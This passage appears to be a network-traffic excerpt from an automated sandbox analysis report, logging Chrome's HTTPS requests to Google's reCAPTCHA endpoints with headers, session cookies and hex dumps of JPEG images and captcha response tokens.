                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC697INData Raw: 31 35 30 34 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 1504JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC1378INData Raw: 68 23 24 0f 5e 9d aa 79 bc c7 70 e9 80 01 6e 43 f0 54 90 a0 af 38 2d 95 03 92 3a 00 0e 2b a7 da 3b 5d bf eb f0 38 e5 1d 5f 6f eb ef f2 e8 57 47 88 5c bb 48 f9 67 8d 59 37 3e 18 0f ba 0f b1 f9 40 ce 72 31 c5 36 da 2d 81 4a 22 4c 19 4c 60 aa 00 18 92 08 40 01 39 53 b8 64 0e a4 8e 7a 55 89 a0 2f 02 31 86 52 8d 9c 01 96 52 55 5b 2a 46 01 ce 3f af 07 19 2c 68 b7 2b c4 22 cb e7 13 6f 18 de bb 8e 41 00 9c 0c 10 c7 1c 36 e5 e9 d0 d7 32 6f 57 fd 7f 5f 88 92 72 df f1 ff 00 86 fe 99 5c a2 22 5b ac b3 f9 b1 c8 a8 b1 23 2f 0e 3e 61 c2 8c 82 4e e3 df 80 c3 8f 48 62 b7 92 65 68 9d bc e9 c1 c9 6d bf 3b 10 30 84 85 62 31 db 00 e3 24 e7 3d b4 1e 41 2b cc 82 07 74 62 e5 1d 48 2c c1 88 e8 07 61 f3 64 73 c8 23 38 5a 22 43 fb b7 5d d3 10 49 49 23 50 c5 bb 13 8e 3e 5f bb c6 07
                                                                                                                                                                                                                                                                  Data Ascii: h#$^ypnCT8-:+;]8_oWG\HgY7>@r16-J"LL`@9SdzU/1RRU[*F?,h+"oA62oW_r\"[#/>aNHbehm;0b1$=A+tbH,ads#8Z"C]II#P>_
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC1378INData Raw: a2 39 c6 78 e4 30 cf b9 3d f3 45 47 34 1e bc ff 00 8f fc 12 55 0a b6 d2 17 5f 2f f2 3e 7a d4 fc 77 e2 eb ab 68 ed 21 92 c7 4d 2a a5 d3 cb 8d cb ab 85 da 77 06 27 f8 48 eb f8 74 34 db 3f 19 78 9e 0d 3e 2d 3e ce f2 ca 35 88 0c 34 56 b8 67 eb 81 96 c8 07 e6 e9 ec 6b 22 da d6 0b e8 e4 87 7c 88 84 12 08 4e 62 2b 82 1b 39 c0 c6 73 92 7d eb 2f 52 d0 e4 95 e6 bc b3 bb 8d 92 16 da e3 cd fb a7 24 e0 0e 37 74 03 8c 74 fc 6b 8f 9a 2d 9d 8e 32 d5 a7 a6 9f e7 a9 d7 cd e3 1f 12 4b b0 9d 69 8c 2e ad 21 45 82 3e 07 d4 ae 41 e7 b0 3f 9d 24 ba ff 00 8a a4 b6 64 bb f1 04 f1 b2 92 c7 72 a2 af 43 8e 00 04 00 02 fd 08 1f 5a f3 66 b2 b8 b4 8d e2 bb 46 d8 46 13 0d 92 a4 9d b8 1e e3 69 cf af d2 a1 0b 3c 0c b9 47 dd bc a6 dd c5 4f 18 1c 60 60 e7 2b f9 0f 4a 6e 95 b6 fd 0c 75 b6 8f
                                                                                                                                                                                                                                                                  Data Ascii: 9x0=EG4U_/>zwh!M*w'Ht4?x>->54Vgk"|Nb+9s}/R$7ttk-2Ki.!E>A?$drCZfFFi<GO``+Jnu
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC1378INData Raw: 94 1d 07 60 3a d1 55 8e a9 16 9c 7c 87 b6 89 18 8d c7 39 20 f6 c8 c0 18 1c 74 a2 aa 34 67 25 74 df dc bf cc de 13 6a 2a d1 5f 3b 1d 56 a3 15 f2 66 59 96 76 de 3c c4 90 02 00 23 3c fc dd 3b 7a 9e 48 aa e4 db 05 21 98 f9 7b f2 4c ab 9f 2f d7 2d d4 e7 07 8f 6a ea 67 d2 26 92 fc ce b0 43 20 18 c1 93 ab f2 49 ef c0 03 1c e7 d7 8e d5 51 3c 2a 91 6d 9e d9 bc ac 38 00 83 d0 f0 46 14 e7 20 1e 7a 0e f5 e5 f3 ae 5f eb fa fe 99 bb bb df f5 fb ba db af ce fe 68 e7 2f 65 82 14 c3 c0 db e2 90 04 1e 66 d6 e4 f0 46 47 b1 c6 7f 3e 95 9d 3c 92 c5 34 73 86 25 d8 3f 96 1c 67 0b 9c 11 80 d8 1d ba 7a 57 67 73 e1 49 2e 24 7f b5 b4 72 34 67 68 7f 30 6e 45 c9 05 98 01 8c f3 9f cf d2 aa df 78 26 ea 4d 4a 59 61 78 e2 88 c9 8f 2a 3d d8 44 c2 85 f9 87 51 9c 7b f1 ef 55 09 c5 6e ed fd
                                                                                                                                                                                                                                                                  Data Ascii: `:U|9 t4g%tj*_;VfYv<#<;zH!{L/-jg&C IQ<*m8F z_h/efFG><4s%?gzWgsI.$r4gh0nEx&MJYax*=DQ{Un
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC557INData Raw: 3c 89 ab 35 fd 7e bf d6 b6 27 3f da 4e ee af 04 4a c4 6d 05 47 6c f2 14 83 9e 01 00 8e e3 03 19 a9 ed 5a f0 8d cf 12 11 1b 6e 64 42 0c 64 9e 9c 7e 1d 7f c2 b3 cf 85 f4 4d c1 ad b5 bd 6a 12 24 de e6 3b a5 61 c9 c8 e0 8e 39 03 3c f6 3e 83 37 b4 8d 32 c2 ce ea 59 2f 35 1d 42 f6 15 85 d3 cb 28 85 84 a5 58 0f 98 61 88 07 19 5c e3 f9 12 50 8b 56 d3 fa b0 9a ba ba d3 e5 fd 79 7f c0 26 5b c9 2d a3 8e 35 f3 60 ca 86 da bf 2f 5e f8 2c 3f cf e5 45 67 0b af 12 ac b3 b4 57 7a 59 8a 49 9d d0 5c d9 06 91 54 9e 01 c3 7a 76 ed 45 65 2c 24 39 9f be bf 0f fe 44 53 af 28 49 a5 77 f2 67 90 f8 0f c5 be 22 f0 ef 8b 34 e5 d3 f5 4b 83 0d db 44 2e 21 95 cb c7 20 67 c1 ca fe 1d 7a d7 55 f1 3b 42 b1 b1 f1 0e a1 7b 07 99 e6 b2 99 fe 62 08 0d 9e dc 67 03 b0 ed 45 15 f4 11 ef ea 73 c9
                                                                                                                                                                                                                                                                  Data Ascii: <5~'?NJmGlZndBd~Mj$;a9<>72Y/5B(Xa\PVy&[-5`/^,?EgWzYI\TzvEe,$9DS(Iwg"4KD.! gzU;B{bgEs
                                                                                                                                                                                                                                                                  2024-10-29 19:10:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  74192.168.2.1649803142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:21 UTC858OUTGET /recaptcha/api2/payload?p=06AFcWeA57XaTzOr6lK-Qv7FFr_QBTPg0S8x0jkWwDyC7I6UHEXC_XFxPaNqt8KR5xYQPoeFcfsjB-M6tXRtBbavQjQWJCF7mZN9_aP-wLP44nVLa4RsNQZUeJDb29hxYKY4rlLOPTs_Td0kCcdGPGiv5xvNGkdS21kUFEBG7OcPIeL4i8e4t6Asyt6YxmP6fiTpBCxz4DxQ7Ys1AsZnDHJBqenX9jed7huQ&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=d54059ff5f6fc7f7 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:21 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:21 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:21 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:21 UTC697INData Raw: 38 32 39 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14
                                                                                                                                                                                                                                                                  Data Ascii: 829JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:21 UTC1378INData Raw: d4 63 81 51 c9 24 91 2a 6d 4d d9 ee 39 c5 69 1d 60 d0 27 d4 9d de 22 59 01 6d c3 8c 8e f5 3c 0a a7 9c 83 8e c6 a1 b4 82 7b db 69 e7 8a 32 45 ba 86 72 38 e0 d3 6c 26 24 9c 60 9f 7a 71 4e d7 0b 97 59 94 3e d0 38 fe 2f 6a b9 6f d7 a9 23 b0 35 02 c6 25 19 38 07 da ac 27 c9 c6 2b 5b f4 27 7d 0b 91 ae 17 ad 58 8c 90 31 83 54 55 f0 3a e6 a7 12 12 3d 29 ad 4a 4c b6 18 8e 2a 39 9b 9e 2a 03 29 c7 5a 63 48 71 80 73 45 8a 43 99 ce 7a d1 4c c1 6e 70 68 a2 c3 bb 3c ca d6 5b af 2b 08 1a 43 9c 81 8c d4 90 ca d2 5d 16 98 f9 47 18 23 18 3f 95 4e 91 c8 fb 11 08 40 b8 e4 71 56 27 87 78 52 aa cc c3 f8 cf 5a 8e 64 d9 8d b5 25 d2 ee 24 8a 50 70 58 8f 97 f0 fa 54 f2 b1 72 59 5b 05 8e 76 67 81 51 d8 40 7e f1 62 08 ea 2a dc 90 e0 ae 05 2b 5d 97 08 e8 76 bf 0f ac 82 f8 6e e2 e6 74
                                                                                                                                                                                                                                                                  Data Ascii: cQ$*mM9i`'"Ym<{i2Er8l&$`zqNY>8/jo#5%8'+['}X1TU:=)JL*9*)ZcHqsECzLnph<[+C]G#?N@qV'xRZd%$PpXTrY[vgQ@~b*+]vnt
                                                                                                                                                                                                                                                                  2024-10-29 19:10:21 UTC21INData Raw: 9a 28 a0 60 49 a7 0a 28 a4 27 b0 e0 38 a2 8a 28 11 ff d9 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: (`I('8(
                                                                                                                                                                                                                                                                  2024-10-29 19:10:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  75192.168.2.1649804142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:24 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 5814
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:24 UTC5814OUTData Raw: 76 3d 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 26 63 3d 30 33 41 46 63 57 65 41 34 6a 68 72 49 37 6f 42 5a 53 4f 35 49 53 61 71 30 46 6d 41 65 43 5a 50 6c 33 5a 62 58 32 55 7a 58 4d 51 6d 59 74 73 79 79 6d 6a 38 71 59 36 63 74 73 44 74 63 55 75 46 42 4d 39 42 6d 47 71 65 5f 74 50 33 37 42 7a 65 2d 76 62 43 62 42 32 35 7a 79 6f 39 6b 73 54 75 64 6f 41 30 64 48 51 73 49 68 63 68 34 42 74 68 57 69 38 32 33 41 38 4e 76 61 64 6a 67 76 67 37 70 74 54 6b 62 48 53 76 66 34 7a 6d 77 74 58 54 44 54 30 68 65 6b 7a 68 4a 51 79 59 6d 74 45 53 48 70 69 38 7a 6c 63 63 7a 62 36 73 62 77 4d 39 49 47 73 6a 46 65 68 4b 6b 79 51 4c 4b 72 4a 70 34 43 37 79 36 32 67 77 66 6f 44 67 31 36 35 74 6a 49 64 34 79 56 31 33 4f 56 7a 4b 4e 62 31 5f 4a 77
                                                                                                                                                                                                                                                                  Data Ascii: v=-ZG7BC9TxCVEbzIO2m429usb&c=03AFcWeA4jhrI7oBZSO5ISaq0FmAeCZPl3ZbX2UzXMQmYtsyymj8qY6ctsDtcUuFBM9BmGqe_tP37Bze-vbCbB25zyo9ksTudoA0dHQsIhch4BthWi823A8Nvadjgvg7ptTkbHSvf4zmwtXTDT0hekzhJQyYmtESHpi8zlcczb6sbwM9IGsjFehKkyQLKrJp4C7y62gwfoDg165tjId4yV13OVzKNb1_Jw
                                                                                                                                                                                                                                                                  2024-10-29 19:10:24 UTC694INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:24 GMT
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:24 UTC684INData Raw: 31 37 62 62 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 34 67 79 47 6b 37 58 71 66 51 50 41 6a 53 75 58 70 54 53 38 6f 77 71 4b 4d 65 6f 77 41 71 33 55 49 75 58 2d 69 34 45 35 2d 4d 74 64 63 54 64 47 45 41 6b 46 4e 74 6e 75 47 37 57 4a 41 58 51 4d 4d 52 58 54 69 4b 52 36 35 73 54 33 65 56 38 45 68 64 38 48 5f 63 64 4b 49 6f 6d 61 57 39 35 46 72 73 4a 47 59 4b 52 66 46 59 53 50 6f 46 42 4f 38 50 68 37 78 37 56 6e 74 65 64 4f 44 67 6f 66 2d 66 48 38 44 6d 50 52 62 48 39 59 4f 6b 4a 39 70 6b 7a 35 59 41 79 31 72 48 69 4c 4c 6c 43 70 59 47 65 6c 44 6f 79 48 5a 31 74 58 58 36 67 53 41 55 4c 5a 46 56 42 6b 37 75 63 6d 54 4a 41 48 48 6a 51 69 74 4c 51 67 6a 4d 72 74 42 2d 46 69 79 71 59 74 4a 53 6e 49 68 71 41 53 4e 67 6c 6c 75 4f
                                                                                                                                                                                                                                                                  Data Ascii: 17bb)]}'["dresp","03AFcWeA4gyGk7XqfQPAjSuXpTS8owqKMeowAq3UIuX-i4E5-MtdcTdGEAkFNtnuG7WJAXQMMRXTiKR65sT3eV8Ehd8H_cdKIomaW95FrsJGYKRfFYSPoFBO8Ph7x7VntedODgof-fH8DmPRbH9YOkJ9pkz5YAy1rHiLLlCpYGelDoyHZ1tXX6gSAULZFVBk7ucmTJAHHjQitLQgjMrtB-FiyqYtJSnIhqASNglluO
                                                                                                                                                                                                                                                                  2024-10-29 19:10:24 UTC1378INData Raw: 65 4d 34 4b 6a 4d 74 70 43 57 62 53 2d 5a 7a 77 57 68 52 39 45 4f 45 49 57 52 43 4a 35 38 71 50 61 7a 53 55 67 61 4e 39 65 4b 37 77 57 42 39 41 61 67 45 61 33 66 76 33 70 64 5f 39 39 4d 76 42 55 62 59 4c 72 6c 6e 59 50 4e 55 47 51 53 46 46 4c 75 57 64 49 31 35 37 4d 57 56 6b 4f 57 44 38 64 44 73 37 67 65 44 57 4f 69 32 57 6e 59 57 59 43 73 74 6f 4e 59 43 38 6f 68 32 68 42 54 55 59 63 76 61 6b 76 70 41 73 73 41 76 7a 50 51 78 6a 44 38 61 66 6e 67 5a 48 73 78 46 56 47 4f 65 4b 54 76 51 43 62 59 75 31 45 6a 74 4f 63 6d 4e 74 71 71 6d 47 67 4a 46 72 48 69 4c 45 41 33 6a 64 69 6d 73 75 45 5f 62 68 41 63 53 67 36 68 78 50 54 4e 32 45 37 34 6d 64 58 39 59 71 71 33 30 71 45 51 74 6b 41 79 61 48 41 51 4f 62 42 30 4e 37 66 77 32 35 30 6b 6d 47 58 53 4c 73 45 68 74
                                                                                                                                                                                                                                                                  Data Ascii: eM4KjMtpCWbS-ZzwWhR9EOEIWRCJ58qPazSUgaN9eK7wWB9AagEa3fv3pd_99MvBUbYLrlnYPNUGQSFFLuWdI157MWVkOWD8dDs7geDWOi2WnYWYCstoNYC8oh2hBTUYcvakvpAssAvzPQxjD8afngZHsxFVGOeKTvQCbYu1EjtOcmNtqqmGgJFrHiLEA3jdimsuE_bhAcSg6hxPTN2E74mdX9Yqq30qEQtkAyaHAQObB0N7fw250kmGXSLsEht
                                                                                                                                                                                                                                                                  2024-10-29 19:10:24 UTC1378INData Raw: 44 7a 42 30 34 4f 78 4e 55 36 47 50 44 30 4c 55 43 5f 58 6e 4b 66 31 7a 63 59 42 6c 4c 38 71 79 64 4e 4e 71 4b 6f 4a 35 54 64 4c 78 79 6b 7a 6a 72 43 6d 54 54 69 71 68 43 6d 72 5a 70 4f 34 4a 68 74 36 67 4c 35 5a 57 58 47 35 45 35 73 67 33 46 38 32 6d 76 41 4e 2d 4f 73 6e 54 73 51 47 2d 74 75 5f 39 57 33 35 50 34 65 54 36 45 4c 57 50 34 41 44 31 34 4f 50 6c 6f 67 4b 49 77 55 35 44 4f 78 31 71 74 68 71 2d 76 50 4c 6c 7a 66 58 5f 52 79 32 71 4a 4b 5a 6c 39 75 31 62 61 31 58 69 32 76 48 45 33 53 70 73 30 62 47 36 63 6f 62 38 46 2d 77 6e 32 32 4a 45 71 31 45 69 73 63 6b 2d 44 6e 45 72 7a 65 62 43 71 46 4f 4c 49 41 75 51 37 56 54 5a 51 58 75 4d 33 67 45 79 46 4d 4f 4d 64 68 78 58 59 58 49 39 59 50 72 62 77 41 5a 45 58 61 6c 65 6f 4a 6c 2d 59 77 78 5a 74 6f 49
                                                                                                                                                                                                                                                                  Data Ascii: DzB04OxNU6GPD0LUC_XnKf1zcYBlL8qydNNqKoJ5TdLxykzjrCmTTiqhCmrZpO4Jht6gL5ZWXG5E5sg3F82mvAN-OsnTsQG-tu_9W35P4eT6ELWP4AD14OPlogKIwU5DOx1qthq-vPLlzfX_Ry2qJKZl9u1ba1Xi2vHE3Sps0bG6cob8F-wn22JEq1Eisck-DnErzebCqFOLIAuQ7VTZQXuM3gEyFMOMdhxXYXI9YPrbwAZEXaleoJl-YwxZtoI
                                                                                                                                                                                                                                                                  2024-10-29 19:10:24 UTC1378INData Raw: 79 5f 6c 6d 47 71 44 6a 6c 72 4c 64 32 73 34 72 66 31 74 65 44 7a 76 6b 6d 6a 56 6c 34 6c 77 63 50 79 37 6c 74 30 68 7a 51 74 4f 4d 66 39 4c 53 69 6e 6a 48 54 43 6a 77 32 6f 4e 76 52 5a 6f 36 53 5f 6a 5a 78 6e 51 46 57 6f 5f 67 6a 57 74 77 72 37 4e 4c 48 2d 62 46 4c 7a 4c 46 39 51 4e 59 56 65 2d 50 38 55 7a 4e 2d 4f 32 43 6d 65 65 65 68 56 6b 47 58 4d 33 56 5a 48 69 77 37 31 34 46 73 4f 63 4d 64 51 64 44 50 64 64 73 32 5a 65 53 6e 72 37 31 4c 69 79 34 77 6e 36 66 73 53 74 71 48 5a 55 74 71 53 48 59 47 67 43 49 74 6f 50 4f 32 54 68 37 77 56 63 77 47 77 45 62 65 6e 61 39 6d 6a 64 47 76 4f 53 51 44 73 45 5f 4f 6b 48 65 43 67 32 47 45 52 6d 79 61 71 32 6d 34 35 54 6c 58 69 67 52 64 31 5f 69 66 36 42 70 77 5f 56 6b 55 66 37 66 53 55 64 79 70 55 6a 66 68 4b 32
                                                                                                                                                                                                                                                                  Data Ascii: y_lmGqDjlrLd2s4rf1teDzvkmjVl4lwcPy7lt0hzQtOMf9LSinjHTCjw2oNvRZo6S_jZxnQFWo_gjWtwr7NLH-bFLzLF9QNYVe-P8UzN-O2CmeeehVkGXM3VZHiw714FsOcMdQdDPdds2ZeSnr71Liy4wn6fsStqHZUtqSHYGgCItoPO2Th7wVcwGwEbena9mjdGvOSQDsE_OkHeCg2GERmyaq2m45TlXigRd1_if6Bpw_VkUf7fSUdypUjfhK2
                                                                                                                                                                                                                                                                  2024-10-29 19:10:24 UTC1265INData Raw: 69 45 68 5a 4e 79 72 46 47 45 4e 45 72 31 64 75 57 47 2d 75 36 6a 49 31 41 30 37 77 69 7a 31 68 4b 54 61 51 34 33 36 32 56 43 71 65 77 5a 63 6c 38 5a 4c 6f 5f 4d 30 4f 47 57 30 66 6b 35 75 52 36 65 65 79 78 56 67 7a 70 55 56 6e 52 63 31 58 33 75 7a 45 36 47 56 4d 6e 52 68 37 6f 68 6b 71 54 34 44 61 52 57 34 6c 6d 77 74 63 35 4f 32 6f 73 4a 37 50 39 6e 52 6c 4c 6c 73 48 79 70 49 67 4a 5f 32 67 30 33 65 52 64 49 57 37 4b 47 58 53 4f 43 64 59 35 6f 39 55 6b 69 39 47 4b 5f 5a 68 46 6d 67 37 61 35 55 4b 66 73 34 31 55 63 63 46 6c 62 6c 47 52 76 5f 5f 64 4f 58 4e 76 30 68 30 4e 5f 38 41 72 76 2d 45 64 6b 6d 67 4c 77 42 56 50 6a 45 33 6a 59 57 56 4f 31 77 45 75 50 33 31 56 49 31 57 44 41 57 71 6b 45 4f 58 7a 72 38 66 46 31 33 5f 33 68 68 37 4b 62 70 73 78 58 72
                                                                                                                                                                                                                                                                  Data Ascii: iEhZNyrFGENEr1duWG-u6jI1A07wiz1hKTaQ4362VCqewZcl8ZLo_M0OGW0fk5uR6eeyxVgzpUVnRc1X3uzE6GVMnRh7ohkqT4DaRW4lmwtc5O2osJ7P9nRlLlsHypIgJ_2g03eRdIW7KGXSOCdY5o9Uki9GK_ZhFmg7a5UKfs41UccFlblGRv__dOXNv0h0N_8Arv-EdkmgLwBVPjE3jYWVO1wEuP31VI1WDAWqkEOXzr8fF13_3hh7KbpsxXr
                                                                                                                                                                                                                                                                  2024-10-29 19:10:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  76192.168.2.1649805142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:25 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
